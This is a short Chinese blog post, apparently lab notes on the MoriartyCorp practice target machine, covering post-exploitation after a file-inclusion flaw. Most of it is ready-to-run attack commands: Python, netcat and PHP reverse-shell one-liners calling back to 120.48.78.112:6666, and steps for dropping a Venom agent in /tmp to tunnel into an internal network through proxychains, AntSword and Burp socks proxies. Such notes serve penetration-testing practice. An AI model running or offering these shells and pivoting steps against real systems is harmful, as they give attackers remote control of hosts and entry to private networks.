MoriartyCorp靶机之文件包含漏洞弹shell、python 反弹shell、nc弹shell、php弹shell、利用venom内网穿透、中国蚁剑配置代理连接内网穿透

本文详细介绍了利用文件包含漏洞进行攻击的方法,包括使用python、nc、php创建反弹shell,以及如何通过venom进行内网穿透。同时,提到了中国蚁剑的代理连接配置和proxychains在内网穿透中的应用,以及burp套件内网抓包的代理设置。
摘要由CSDN通过智能技术生成

目录

文件包含漏洞弹shell

python 反弹shell

nc弹shell

php弹shell

利用venom内网穿透

中国蚁剑配置代理连接内网穿透


文件包含漏洞弹shell

python 反弹shell

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

nc弹shell

nc -e /bin/bash 120.48.78.112 6666

php弹shell

php -r '$sock=fsockopen("120.48.78.112",6666);exec("/bin/bash -i 0>&3 1>&3 2>&3");'

proxychains 代理的配置

利用venom内网穿透

服务器端监听:

1、赋予执行权限 chmod 644 admin_linux_x64

2、admin_linux_x64 -lport xxxx

客户端:99999

1、agen_linux_x64放到目标主机

2、尽量放到有执行权限的目录例如/tmp

3、赋予执行权限 chmod 777 agen_linux_x64

4、命令:agen_linux_x64 -lhost xx.xx.xx.xx -lport xxxx

连接成功:

服务器端:

查案节点:show

进入节点:goto 1

设置代理:socks 1080

注意:在proxychains 配置文件

vi /etc/proxychains4.conf

最后一行配置

socks 1080

并且注释掉 remote_dns_subnet 224

在其他内网穿透命令前要用proxychains

中国蚁剑配置代理连接内网穿透

在代理设置里面设置

socks5 127.0.0.1 1080

burp内网抓包

在user options中设置socks5 proxy

socks proxy host 127.0.0.1

socks proxy port 1080

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值